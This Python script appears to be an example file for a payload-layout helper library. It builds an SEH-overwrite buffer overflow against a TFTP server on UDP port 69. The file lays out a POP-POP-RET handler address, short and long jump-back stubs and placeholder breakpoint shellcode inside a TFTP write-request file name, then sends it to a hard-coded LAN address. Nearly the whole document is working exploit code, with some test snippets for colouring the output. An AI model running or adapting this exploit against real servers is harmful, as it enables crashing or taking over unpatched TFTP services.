tsunulukai_pwn_canvas_example.py

#!/usr/bin/env python

from tsunulukai_pwn_canvas import *

# Target
host="192.168.1.100"
port=69
tpt="udp"

# Snippets
seh = struct.pack('<I',0x0040484F)  # POP EDI, POP EBP, RET
jmpback="\xeb\xea" # jmp short -20
longjmpback="\xd9\xee\xd9\x74\x24\xf4\x59\x80\xc1\x0a\x90\xfe\xcd\xfe\xcd\xff\xe1" #jmp eip-512
sc=brk*350

# Buffer
p = payload(nop*1236)
p = payload(length=1239)
p.add(snip(1232,seh,"seh",CYEL))    # SEH handler SEH chain SE handler=31704230; Pattern 0Bp1 (0x31704230) found in cyclic pattern at position 1232
p.add(snip(1228,jmpback,"jmpback",CRED))
p.add(snip(1208,longjmpback,"longjmpback",CPUR))
p.add(snip(194+512,sc,"sc",CGRE))
p.add(snip(194+600,"AAAAAAAAAAAARGHH","overlaptest",CYEL))
p.add(snip(672,nop*8,"nop"))    # Autocolor test
p.add(snip(680,brk*8,"brk"))    # Autocolor test
p.add(snip(688,"\xff"*8,"ff"))    # Autocolor test
p.generate()
buf = p.content


#Build TFTP packet
opcode = "\x00\x02"     # TFTP WRQ
fn     = buf
mode   = "netascii"
null   = "\x00"
req    = opcode + fn + null + mode + null

# The intermediate null byte is now part of the fn (jmpecx)
req = opcode + fn + mode + null

#Connect and send
print("len : " + str(len(req)))
p.hexdump()
c=pwn.connect(host=host,port=port,typ=tpt)
c.send(req)
#print c.recv()
c.close()